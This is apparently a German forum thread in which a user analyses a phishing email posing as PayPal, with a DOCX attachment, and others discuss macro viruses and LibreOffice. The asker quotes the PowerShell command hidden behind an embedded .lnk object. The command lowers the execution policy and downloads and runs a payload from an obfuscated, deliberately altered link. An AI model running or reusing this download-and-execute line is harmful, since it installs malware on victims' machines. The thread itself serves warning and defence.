Wie aktiviert sich ein Computervirus in einer DOCX-Word-Datei?
Ich erhielt eine E-Mail, die vorgab, von PayPal zu sein, jedoch zu viele Anzeichen zeigte, dass sie nicht von PayPal sein kann, wie Rechtschreibfehler und Transaktionen, mit denen ich nichts zu tun hatte.
Diese E-Mail enthielt einen Anhang mit dem Dateinamen
paypal-kaeuferschutz-PP-006-824-772-751.docx
Virustotal (gutefrage.net lässt leider nicht zu, dass ich den Link auf die hochgeladene Datei hier veröffentliche) sagt, dass 7 von 57 Scannern in dieser DOCX-Datei einen Virus finden.
In der E-Mail selbst stand auch "OpenOffice und LibreOffice sind mit dem von uns eingesetzten Paypal Sicherheitszertifikat nicht kompatibel. Bitte benutzen Sie daher zur Ansicht des beigefügten Anhangs Microsoft Word".
Diese DOCX-Datei hab ich natürlich nicht mit MS-Word geöffnet, sondern mit Google Chrome OS's Office Compatibility Mode im Guest Modus auf einem Chromebook, welches relativ sicher für diesen Zweck ist.
In der DOCX-Datei selbst stand dann: "Um die volle Ansicht dieses Dokuments zu aktivieren, klicken Sie bitte auf den umrahmten Button oben und bestätigen Sie das für die Ansicht dieser Nachricht gültige Sicherheitszertifikat.".
Der erwähnte umrahmte Button bzw. irgendein sonstiger Button zum Aktivieren von Makros tauchte nicht auf.
Nach langer Vorrede nun meine Fragen:
-
Hätte ich ein ganz aktuelles (mit allen Security-Patches ausgestattetes) Word verwendet, wäre damit eine Infektion möglich gewesen, trotz "Durch die Einführung der neuen XML-basierenden MS Office-Formate ab 2007 können Makros nicht mehr in Dateien mit den Suffixen XLSX, DOCX, PPTX, etc. aufgeführt werden"?
-
Bedeutet die Aussage "OpenOffice und LibreOffice sind mit dem von uns eingesetzten Paypal Sicherheitszertifikat nicht kompatibel", dass diese zwei Programme in Bezug auf dieses spezielle DOCX-Dokument den Virus nicht durchgelassen hätten? Wenn ja, lässt sich diese Aussage verallgemeinern, wenn auch nur in der Form "LibreOffice ist nicht ganz so anfällig"?
3 Antworten
Bist du wirklich ganz sicher das es sich um eine DOCX handelt?
Gerne verwendet werden ja Doppelte Endungen, also zB
LiesMich.DOCX.DOC
In der Windowsstandardeinstellung werden die Endungen ausgeblendet und dieser Datei dann als LiesMich.DOCX angezeigt oder es gar keine DOCX ist.
In einer richtigen DOCX müsste man schon etwas nachladen, zB mit einem Link den man aktiviert.
Datei-Extensions sollten nie der einzige Hinweis auf Sicherheit sein,
weil sie einfach nachzuahmen sind. Auch kann Office Dateien öffnen und
lesen, wenn deren Extension geändert wurde. Als Schutz vor
Makro-basierten Angriffen ist es empfehlenswert, die Makrosicherheits-Funktionalität in Office-Anwendungen zu aktivieren.
https://blog.trendmicro.de/makros-als-infektionsvektor-sind-wieder-da/
Man könnte also zum Beispiel eine DOCM-Datei erstellen, mit den passenden Makros versehen und diese anschließend in eine DOCX umbenennen. Schon funktionieren Makros auch in DOCX.
In Bezug auf LibreOffice heißt es:
Bis auf wenige Ausnahmen können Microsoft Office und LibreOffice nicht dieselben Makro-Codes ausführen.
Die Chancen, mit einem für MS Office programmierten Makro in LibreOffice infiziert zu werden, sind in der Tat gering, da MS Office und LibreOffice unterschiedliche Objekte und Methoden bei der Makroprogrammierung nutzen. Komplett ausgeschlossen wird diese Möglichkeit aber nicht.
Es wäre somit heikel, sich in Sicherheit zu wiegen, weil die Datei eine bestimmte Endung hat oder nur noch mit einer bestimmten Anwendung geöffnet wird.
Sicher bin ich mir nicht. Ich beschäftige mich natürlich auch nicht den ganzen Tag mit dem Entwickeln von Angriffsmethoden dieser Art. ;)
Wenn aber Unternehmen, die sich mit dem Thema IT-Sicherheit diesbezüglich beschäftigen, auf diese Art zur Vorsicht mahnen, vertraue ich lieber deren Aussage, statt mich zu sehr in Sicherheit zu wiegen.
Potentielle Angreifer stürzen sich natürlich gerne auf Methoden, mit denen sie möglichst viele Ziele bei geringstem Aufwand treffen können. Da Makros heutzutage nicht mehr so freiwillig aktiviert werden, gerieten derartige Möglichkeiten in Vergessenheit.
Aber gerade das birgt ja die Gefahr. Denkt man nicht mehr an die Risiken in diesem Bereich, wird man unvorsichtig. Werden viele Menschen unvorsichtig, wird die Methode wieder interessant für Angreifer.
Genauso verhält es sich mit MS Office und Libre Office. Würde die breite Masse nun auf einmal sagen: "Libre Office ist sicher. Drum öffne ich nur noch damit.", wären Makros bald auch für dieses höchst interessant.
Von daher ist Linux auch nur so lange "sicher", bis eine Distribution den kompletten Markt erobert. ;)
Wenn ich eine DOCM-Datei, welche ein Makro enthält, in DOCX umbenenne und mit MS-Word2016 öffne, kommt die Fehlermeldung "The Open XML file ...docx cannot be opened because there are problems with the contents". Wenn ich eine DOC-Datei, welche ein Makro enthält, in DOCX umbenenne und mit MS-Word2016 öffne, kommt die Fehlermeldung "Word can't open because the file format does not match the file extension".
Aber jetzt wird's spannend: Wenn ich besagte Datei "paypal-kaeuferschutz-PP-006-824-772-751.docx" in einer geschützten Umgebung mit MS-Word2016 öffne, kommt weder die eine noch die andere dieser beiden Fehlermeldungen, auch keine Aufforderung durch Word, irgendetwas zu aktivieren.
Jedoch sehe ich eine Grafik mit der Aufschrift "Paypal Sicherheitszertifikat - PP-006-824-772-751.lnk". Ein Doppelklick auf diese Grafik erzeugt ein Pop-Up mit dem Warnhinweis "Paketinhalt öffnen - Sicherheitswarnung - Möchten Sie diese Datei öffnen?", was ich dankend ablehne.
Ein Rechtsklick auf die Grafik offenbart mir, dass ein Doppelklick den Befehl
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c Set-ExecutionPolicy Unrestricted -Force -Scope CurrentUser;&powershell -ep bypass -E "(New-Object Net.WebClient).DownloadString('htt'+'p://bit.ly/3kfkxnq')";&powershell;
ausführen würde. Man möge mir verzeihen, dass ich den Original-Code an der Stelle "bit.ly/3kfkxnq" modifiziert habe, damit niemand auf die Idee kommt, es tatsächlich auszuprobieren. Aktuell zeigt die bit.ly-Adresse auf eine URL à la https://a.pomf.space/bpncaxwbqmec.txt (hab ich ebenfalls modifiziert) und es wird ein ca. 5kB großer Text à la bgB6ADYAMQBPAGQASgBmAEkARQBGAE8AVABzAEIASABXAFcAaABx... (und so weiter) angezeigt.
Ich denke, damit wäre es so gut wie bewiesen, dass man sich auch über DOCX-Dateien was ganz Böses einfangen kann. Allerdings muss man da als User schon aktiv mitarbeiten und diese Datei / dieses Objekt "Paypal Sicherheitszertifikat - PP-006-824-772-751.lnk" doppelklicken. Der Aufforderung im DOCX-Dokument "Um die volle Ansicht dieses Dokuments zu aktivieren, klicken Sie bitte auf den umrahmten Button oben und bestätigen Sie das für die Ansicht dieser Nachricht gültige Sicherheitszertifikat" sollte man also nicht Folge leisten.
Vielen Dank übrigens an alle, die Antworten geliefert haben.
Ich denke mal, es gehört nicht nur meine Mutter zu den Usern, die immer wieder mit der Aussage kommt: "Die haben doch geschrieben, ich soll das machen!" :D
An aktiven Usern mangelt es auf gar keinen Fall.
Vielen Dank für die ausführliche Info!
Wenn ich das mit meinem Word nachvollziehe kommt immer eine Fehlermeldung wenn eine docm die in docx umbenannt wurde versucht wird zu öffnen.
Werde ich bei Gelegenheit nochmal mit der 365er Version probieren.
1. Makroviren sind immer noch im Umlauf, obwohl Makros standardmäßig in neueren Office-Versionen deaktiviert sind. man würde von solchen Dokumenten aufgefordert werden diese zu aktivieren und dergleichen.
Man würde denken das sei etwas ineffizient, aber es gibt immer noch Leute die gleich drauf los klicken...
2. Diese Viren sind meist in VBA geschrieben, wodurch OpenOffice usw. sie nicht ausführt, aber es gibt auch Viren die bei diesen Programmen wirken.
Warum sollte das ineffezient sein?
Ja der "Experte" sagt sehr leicht "warum klicken die Leute da auf ja/aktivieren".
Aber wie sieht denn die Arbeit für viele Anwender aus?
Treiber, Programmupdate, neue Software - ständig wird der Anwender gebeten irgendwas zu aktivieren oder akzeptieren.
In vielen Arbeitsumgebungen gibt es auch regelmäßig irgendwas mit Makros. Seie es eine Zeitverwaltung in Excel oder eine automatisch "gelesen" Bestädigung eines Word Dokuments.
Und auch nach 10 Jahren gibt es in der realen Arbeitswelt noch ettliche alte DOC Vorlagen und Co.
Die meisten Anweder haben daher gar nicht dümmlich das Virus aktiviert, sondern aktivieren jährlich hunderte Abfragen. Und da der Mensch nunmal Gewohnheitstier ist, wird irgendwann automatisch auf "ja" geklickt.
Die Abfragen sind oftmals nicht auf dem Papier sinnvoll, im praktischen Einsatz MUSS der Laie hier Fehler machen.
Hi Benno399, dein Argument zu Frage #1 würde stimmen, wenn es sich um ein DOC oder DOCM-Datei gehandelt hätte. Aber bei DOCX-Dateien würde Word ein eventuell enthaltenes Makro gar nicht aktivieren können, es würde also den User nicht mal fragen, ob er es aktivieren möchte, das Makro würde also gar nicht starten können. Lieg ich da falsch?
Zu deiner Antwort auf Frage #2: Heißt das, VBA-Makros laufen nur in Word und nicht in LibreOffice/OpenOffice, es gibt aber noch andere, Non-VBA-Makros, und nur die könnten in LibreOffice/OpenOffice als Makrovirus zuschlagen?
im Bezug auf Makros hast du recht, da docx eigentlich nur ein geziptes XML-Dokument ist. Bei docm und doc verhält es sich anders. trotzdem lässt sich sicherlich auf verschiedenste weisen Schadcode verstecken und ich glaub das kaum ein einfacher Nutzer zu starkt auf Dateiendungen achtet, wenn die Mail nicht zu verräterisch ist.
VBA wird in vielen Anwendungen verwendet. Alle MS Office Tools, aber auch einige Lizenzen wie Makros für Corel, AutoCAD, ...
VBA stammt von Microsofts Viusal Basic ab, während OpenOffice Basic Code verwendet, weshalb gewisse Elemente sehr ähnlich/gleich sind.
Bist du sicher?
Das Speicherformat docx zu docm ist ja derart unterschiedlich, dass Office normalerweise nach dem Umbenennen einfach meldet die Datei sei nicht lesbar.